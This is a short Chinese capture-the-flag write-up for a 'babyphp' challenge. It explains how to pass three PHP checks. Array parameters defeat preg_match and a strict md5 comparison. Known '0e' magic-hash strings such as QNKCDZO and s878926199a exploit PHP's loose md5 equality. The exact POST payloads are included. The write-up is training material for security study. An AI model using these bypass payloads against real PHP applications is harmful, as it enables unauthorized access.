标签：Spring Recruit b1 && c2 POST babyphp c1 md5

打开靶机，先看了一遍代码，发现要拿到flag，就必须先满足三个条件，即分别为a,b,c

第一层：需要a满足条件

isset($_POST['a'])&&!preg_match('/[0-9]/',$_POST['a'])&&intval($_POST['a']

因为这里有preg_match那么就可以用数组进行绕过，即a[]=0,用post的方法传上去

出现go on 说明第一层成功绕过

第二层：需要两个b满足

if(isset($_POST['b1'])&&$_POST['b2']){
        if($_POST['b1']!=$_POST['b2']&&md5($_POST['b1'])===md5($_POST['b2']))

需要传入的b1和b2的值不相等，但是b1和b2的md5值相等，这也可以使用相同方法的数组绕过

即b1[]=1&b2[]=2

出现yee，绕过成功

第三层：需要两个c满足

if($_POST['c1']!=$_POST['c2']&&is_string($_POST['c1'])&&is_string($_POST['c2'])&&md5($_POST['c1'])==md5($_POST['c2']))

需要c1和c2的值不相等，并且c1和c2都是字符串，而且md5的值弱相等。

那么就不能用数组绕过，需要用md5的字符串绕过

QNKCDZO
0e830400451993494058024219903391
 
s878926199a
0e545993274517709034328855841020
 
s155964671a
0e342768416822451524974117254469
 
s214587387a
0e848240448830537924465865611904
 
s214587387a
0e848240448830537924465865611904
 
s878926199a
0e545993274517709034328855841020

让c1和c2的值等于上面随机的两组数

c1=QNKCDZO&c2=s878926199a

即得到flag

标签：Spring,Recruit,b1,&&,c2,POST,babyphp,c1,md5
来源： https://www.cnblogs.com/traverller-2333/p/16351333.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。